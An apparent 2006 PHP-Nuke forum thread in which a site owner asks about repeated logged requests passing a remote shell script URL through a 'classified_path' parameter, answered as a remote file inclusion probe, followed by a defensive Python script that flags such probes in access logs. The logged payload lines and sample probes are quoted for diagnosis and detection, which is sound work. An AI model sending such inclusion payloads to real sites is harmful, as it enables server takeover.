Ravens PHP Scripts: Forums
 

 

2Bob
Hangin' Around


Joined: Jan 24, 2006
Posts: 25

Posted: Mon Oct 16, 2006 2:13 am

Hi, I have several different identities (IPs etc) trying to access this page on my site:

modules.php?classified_path=http://tinypath.com/sdy/test/shell.txt?

As far as I can see there is no file "classified_path".

What are they doing?
What is this?

Quote:
62.149.140.32 - webx22.aruba.it
modules.php?classified_path=http://tinypath.com/sdy/test/shell.txt? 2006-10-16 06:21:51
modules.php?classified_path=http://tinypath.com/sdy/test/shell.txt? 2006-10-16 06:07:26
modules.php?classified_path=http://tinypath.com/sdy/test/shell.txt? 2006-10-16 05:53:05
modules.php?classified_path=http://tinypath.com/sdy/test/shell.txt? 2006-10-16 05:49:25

216.251.35.176 - web176.megawebservers.com
modules.php?classified_path=http://tinypath.com/sdy/test/shell.txt?

216.251.35.125 web125.megawebservers.com
modules.php?classified_path=http://tinypath.com/sdy/test/shell.txt?

216.251.35.181 web181.megawebservers.com
modules.php?classified_path=http://tinypath.com/sdy/test/shell.txt?

216.251.35.123 web123.megawebservers.com
modules.php?classified_path=http://tinypath.com/sdy/test/shell.txt?

216.251.35.126 web126.megawebservers.com
modules.php?classified_path=http://tinypath.com/sdy/test/shell.txt?


Thanks in advance for any assistance.
 
hitwalker
Sells PC To Pay For Divorce


Joined:
Posts: 5661

Posted: Mon Oct 16, 2006 2:31 am

That's just an exploit by wannabe hackers....
and it's towards the wrong CMS....
 
2Bob
Posted: Mon Oct 16, 2006 4:18 am

Thank you hitwalker,

This is what I thought but really appreciate your confirmation.

BTW I should have mentioned, I'm using phpnuke (but I guess you worked that out).
 
hitwalker
Posted: Mon Oct 16, 2006 5:59 am

Yes, I know.. that's why I said the hack attempt is towards the wrong CMS, meaning it's not for phpnuke....
 
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

Posted: Mon Oct 16, 2006 12:20 pm

Yes, this exploiter has been very active, attacking all kinds of vulnerabilities. An easy way to stop him is to block libwww-perl in .htaccess.
There is a recent thread on how to do this.

I have reported tinypath.com to their host, but nothing has been done.

Guardian2003
Site Admin


Joined: Aug 28, 2003
Posts: 6793
Location: Ha Noi, Viet Nam

Posted: Mon Oct 16, 2006 1:10 pm

I just checked my 'bust them' email folder in Outlook and I too reported them, but it was several weeks ago.
If they are still live when I return from holiday I'll see if I can go directly to the data center; they are usually more willing to take action.
 
All times are GMT - 6 Hours
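
A triage script for the kind of probe shown in this thread, added here as an example and not code from any poster or from PHP-Nuke: it scans Apache combined-format access log lines for query parameters whose value is a remote URL, and records whether the client identified itself as libwww-perl. The log lines, the documentation-range addresses and the remote.example host are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)
REMOTE_VALUE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

SAMPLE_LOG = [  # constructed lines, not taken from the thread
    '192.0.2.10 - - [16/Oct/2006:06:21:51 -0600] "GET /modules.php?classified_path=http://remote.example/test/shell.txt? HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [16/Oct/2006:06:22:10 -0600] "GET /modules.php?classified_path=http%3A%2F%2Fremote.example%2Ftest%2Fshell.txt%3F HTTP/1.0" 200 5120 "-" "libwww-perl/5.803"',
    '203.0.113.5 - - [16/Oct/2006:06:23:02 -0600] "GET /modules.php?name=News&file=article&sid=12 HTTP/1.1" 200 20480 "http://www.example.org/" "Mozilla/5.0"',
]

def find_rfi_probes(lines):
    """Return one record per request whose query string carries a remote URL as a parameter value."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        query = urlsplit(m["target"]).query
        # parse_qsl percent-decodes values, so http%3A%2F%2F... is caught as well
        params = [k for k, v in parse_qsl(query, keep_blank_values=True)
                  if REMOTE_VALUE.match(v.strip())]
        if params:
            hits.append({"ip": m["ip"], "time": m["ts"], "params": params,
                         "status": int(m["status"]),
                         "libwww_perl": "libwww-perl" in m["ua"].lower()})
    return hits

def summarize(hits):
    """Group hits by parameter name, listing the distinct source IPs that sent each one."""
    by_param = defaultdict(set)
    for h in hits:
        for p in h["params"]:
            by_param[p].add(h["ip"])
    return {p: sorted(ips) for p, ips in by_param.items()}

if __name__ == "__main__":
    for param, ips in summarize(find_rfi_probes(SAMPLE_LOG)).items():
        print(f"{param}: {len(ips)} source(s): {', '.join(ips)}")
```

A parameter that legitimately carries a URL (a redirect target, for example) will also be listed, so treat the output as a starting point for review rather than a verdict.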
 